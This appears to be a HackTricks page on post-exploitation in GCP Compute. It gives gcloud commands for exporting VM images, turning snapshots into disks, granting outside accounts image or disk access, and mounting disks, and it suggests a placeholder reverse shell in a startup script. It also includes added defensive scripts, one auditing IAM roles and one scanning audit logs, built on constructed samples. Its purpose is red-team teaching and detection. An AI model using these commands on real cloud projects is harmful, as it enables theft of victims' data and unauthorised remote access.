GCP - Compute Post Exploitation
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Compute
For more information about Compute and VPC (Networking) check:
Export & Inspect Images locally
This allows an attacker to access the data contained in already existing images, or to create new images of running VMs and read their data without ever having access to the running VM itself.
It's possible to export a VM image to a bucket, then download it and mount it locally:
gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# Then download the exported file from the bucket and mount it locally
To perform this action the attacker might need privileges over the storage bucket and will definitely need privileges over Cloud Build, as that is the service which is asked to perform the export.
Moreover, for this to work the Cloud Build SA and the Compute SA need privileged permissions.
The Cloud Build SA <project-id>@cloudbuild.gserviceaccount.com needs:
- roles/iam.serviceAccountTokenCreator
- roles/compute.admin
- roles/iam.serviceAccountUser
And the SA <project-id>-compute@developer.gserviceaccount.com needs:
- roles/compute.storageAdmin
- roles/storage.objectAdmin
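Because the export only works when both service accounts already hold the roles listed above, a defender can audit that precondition directly from the project IAM policy. The following script is an added example (not HackTricks code) that reads a policy in the JSON shape printed by gcloud projects get-iam-policy PROJECT --format=json and reports which of those roles each SA is missing; the sample policy embedded in it is constructed, and the service-account emails are passed in explicitly because in a real project the local part of both addresses is the project number rather than the project id.

```python
"""Audit whether the Cloud Build SA and the default Compute SA hold the role
set that makes a VM image export possible.  Added example; the policy below is
constructed, not taken from a real project."""
import json
import sys

# Role sets as listed on the page.
CLOUDBUILD_REQUIRED = {
    "roles/iam.serviceAccountTokenCreator",
    "roles/compute.admin",
    "roles/iam.serviceAccountUser",
}
COMPUTE_REQUIRED = {
    "roles/compute.storageAdmin",
    "roles/storage.objectAdmin",
}
# roles/owner grants every permission, so it satisfies any required role.
SUPERSET_ROLES = {"roles/owner"}


def roles_held(policy, member):
    """Roles bound to `member` in a policy as returned by
    `gcloud projects get-iam-policy PROJECT --format=json`.
    Bindings carrying an IAM condition are skipped: they may not apply."""
    held = set()
    for binding in policy.get("bindings", []):
        if "condition" in binding:
            continue
        if member in binding.get("members", []):
            held.add(binding["role"])
    return held


def missing_roles(required, held):
    """Required roles not covered by what the member holds."""
    if held & SUPERSET_ROLES:
        return set()
    return required - held


def export_preconditions(policy, cloudbuild_sa, compute_sa):
    """Report, per service account, which export-related roles are missing and
    whether the combination described on the page is fully in place."""
    cb_missing = missing_roles(
        CLOUDBUILD_REQUIRED, roles_held(policy, f"serviceAccount:{cloudbuild_sa}"))
    c_missing = missing_roles(
        COMPUTE_REQUIRED, roles_held(policy, f"serviceAccount:{compute_sa}"))
    return {
        "cloudbuild_missing": sorted(cb_missing),
        "compute_missing": sorted(c_missing),
        "export_possible": not cb_missing and not c_missing,
    }


# Constructed sample: the Cloud Build SA has all three roles, the default Compute
# SA still has the default roles/editor plus storageAdmin but lacks objectAdmin.
SAMPLE_PROJECT_NUMBER = "123456789012"  # placeholder value
SAMPLE_CLOUDBUILD_SA = f"{SAMPLE_PROJECT_NUMBER}@cloudbuild.gserviceaccount.com"
SAMPLE_COMPUTE_SA = f"{SAMPLE_PROJECT_NUMBER}-compute@developer.gserviceaccount.com"
SAMPLE_POLICY = {
    "bindings": [
        {"role": "roles/iam.serviceAccountTokenCreator",
         "members": [f"serviceAccount:{SAMPLE_CLOUDBUILD_SA}"]},
        {"role": "roles/compute.admin",
         "members": [f"serviceAccount:{SAMPLE_CLOUDBUILD_SA}"]},
        {"role": "roles/iam.serviceAccountUser",
         "members": [f"serviceAccount:{SAMPLE_CLOUDBUILD_SA}"]},
        {"role": "roles/editor",
         "members": [f"serviceAccount:{SAMPLE_COMPUTE_SA}"]},
        {"role": "roles/compute.storageAdmin",
         "members": [f"serviceAccount:{SAMPLE_COMPUTE_SA}", "user:alice@example.com"]},
    ]
}


def main():
    # Pipe a real policy on stdin, or run without input to use the sample.
    policy = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_POLICY
    print(json.dumps(
        export_preconditions(policy, SAMPLE_CLOUDBUILD_SA, SAMPLE_COMPUTE_SA), indent=2))


if __name__ == "__main__":
    main()
```

Run it as gcloud projects get-iam-policy PROJECT --format=json | python3 audit_export_roles.py; an "export_possible": true result means the two service accounts together already satisfy the page's precondition and are worth trimming, while conditional bindings are deliberately ignored so that the check never reports a role as held when a condition might deny it.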
Export & Inspect Snapshots & Disks locally
It's not possible to directly export snapshots and disks, but it's possible to turn a snapshot into a disk and a disk into an image, and then, following the previous section, export that image to inspect it locally:
# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]
# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]
Inspect an Image creating a VM
With the goal of accessing the data stored in an image, or inside a running VM of which an attacker has created an image, it is possible to grant an external account access over the image:
gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'
and then create a new VM from it:
gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]
If you could not give your external account access over the image, you could launch a VM using that image in the victim's project and make the metadata execute a reverse shell to access the image, adding the parameter:
--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'
Inspect a Snapshot/Disk attaching it to a VM
With the goal of accessing the data stored in a disk or a snapshot, you could transform the snapshot into a disk and the disk into an image, and follow the previous steps.
Or you could grant an external account access over the disk (if the starting point is a snapshot, give access over the snapshot or create a disk from it):
gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'
Attach the disk to an instance:
gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]
Mount the disk inside the VM:
1. SSH into the VM:
gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
2. Identify the disk: once inside the VM, identify the new disk by listing the disk devices. Typically it appears as /dev/sdb, /dev/sdc, etc.
3. Format and mount the disk (if it's a new or raw disk):
- Create a mount point:
sudo mkdir -p /mnt/disks/[MOUNT_DIR]
- Mount the disk:
sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
If you cannot give an external project access to the snapshot or disk, you might need to perform these actions inside an instance in the same project as the snapshot/disk.
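Both the image route (roles/compute.imageUser granted to an outside principal) and the disk route (roles/compute.storageAdmin granted, then a disk attached to an instance) leave project-level admin-activity entries in Cloud Audit Logs, which is where a defender catches this. The script below is an added detection example, not HackTricks code: it walks audit-log entries exported as one JSON object per line, flags SetIamPolicy binding deltas that add either of those two roles to a member outside a trusted domain or project, and records every disk attach. The log lines it contains are constructed; the Compute method name v1.compute.instances.attachDisk and the request.source field it reads are assumptions to verify against your own logs before relying on them.

```python
"""Scan exported Cloud Audit Log entries for the two events used on this page:
an external principal gaining roles/compute.imageUser or
roles/compute.storageAdmin, and a disk being attached to an instance.
Added detection example; the sample entries are constructed, not captured."""
import json

WATCHED_ROLES = {"roles/compute.imageUser", "roles/compute.storageAdmin"}
# Assumed method name for Compute Engine admin-activity logs; confirm in your logs.
ATTACH_DISK_METHOD = "v1.compute.instances.attachDisk"


def member_is_external(member, trusted_domains, trusted_projects):
    """True when an IAM member string does not belong to a trusted domain,
    a trusted project's service accounts, or a trusted project number's
    default Compute SA."""
    kind, _, ident = member.partition(":")
    if kind in ("allUsers", "allAuthenticatedUsers"):
        return True
    local, _, domain = ident.rpartition("@")
    if kind == "serviceAccount" and domain == "developer.gserviceaccount.com":
        # default Compute SA: <project-number>-compute@developer.gserviceaccount.com
        return local.split("-")[0] not in trusted_projects
    if kind == "serviceAccount" and domain.endswith(".gserviceaccount.com"):
        # user-managed SA: <name>@<project-id>.iam.gserviceaccount.com
        return domain.split(".")[0] not in trusted_projects
    return domain not in trusted_domains


def scan_audit_log(lines, trusted_domains, trusted_projects):
    """Return a list of findings for the log lines given (one JSON object each)."""
    findings = []
    for raw in lines:
        entry = json.loads(raw)
        payload = entry.get("protoPayload", {})
        method = payload.get("methodName", "")
        actor = payload.get("authenticationInfo", {}).get("principalEmail", "unknown")
        resource = payload.get("resourceName")
        if method == "SetIamPolicy":
            deltas = (payload.get("serviceData", {})
                      .get("policyDelta", {})
                      .get("bindingDeltas", []))
            for delta in deltas:
                if (delta.get("action") == "ADD"
                        and delta.get("role") in WATCHED_ROLES
                        and member_is_external(delta.get("member", ""),
                                               trusted_domains, trusted_projects)):
                    findings.append({"kind": "external_grant", "actor": actor,
                                     "role": delta["role"], "member": delta["member"],
                                     "resource": resource})
        elif method == ATTACH_DISK_METHOD:
            # Disk attaches are rare enough in most projects to review one by one.
            findings.append({"kind": "disk_attached", "actor": actor,
                             "resource": resource,
                             "disk": payload.get("request", {}).get("source")})
    return findings


# Constructed sample entries (trimmed to the fields the scanner reads).
SAMPLE_LOG = [
    json.dumps({"protoPayload": {
        "methodName": "SetIamPolicy",
        "authenticationInfo": {"principalEmail": "bob@example.com"},
        "resourceName": "projects/victim-proj",
        "serviceData": {"policyDelta": {"bindingDeltas": [
            {"action": "ADD", "role": "roles/compute.imageUser",
             "member": "serviceAccount:reader@other-proj.iam.gserviceaccount.com"}]}}}}),
    json.dumps({"protoPayload": {
        "methodName": "SetIamPolicy",
        "authenticationInfo": {"principalEmail": "bob@example.com"},
        "resourceName": "projects/victim-proj",
        "serviceData": {"policyDelta": {"bindingDeltas": [
            {"action": "ADD", "role": "roles/compute.storageAdmin",
             "member": "user:alice@example.com"}]}}}}),
    json.dumps({"protoPayload": {
        "methodName": ATTACH_DISK_METHOD,
        "authenticationInfo": {"principalEmail": "bob@example.com"},
        "resourceName": "projects/victim-proj/zones/us-central1-a/instances/vm-1",
        "request": {"source": "projects/victim-proj/zones/us-central1-a/disks/data-1"}}}),
]

TRUSTED_DOMAINS = {"example.com"}
TRUSTED_PROJECTS = {"victim-proj", "123456789012"}

if __name__ == "__main__":
    for finding in scan_audit_log(SAMPLE_LOG, TRUSTED_DOMAINS, TRUSTED_PROJECTS):
        print(json.dumps(finding))
```

Only additions of the two watched roles to outside members are reported, so the internal storageAdmin grant in the sample is silently accepted while the cross-project imageUser grant and the disk attach each produce one finding; on real data, feed the script a sink export or the output of gcloud logging read --format=json, one entry per line.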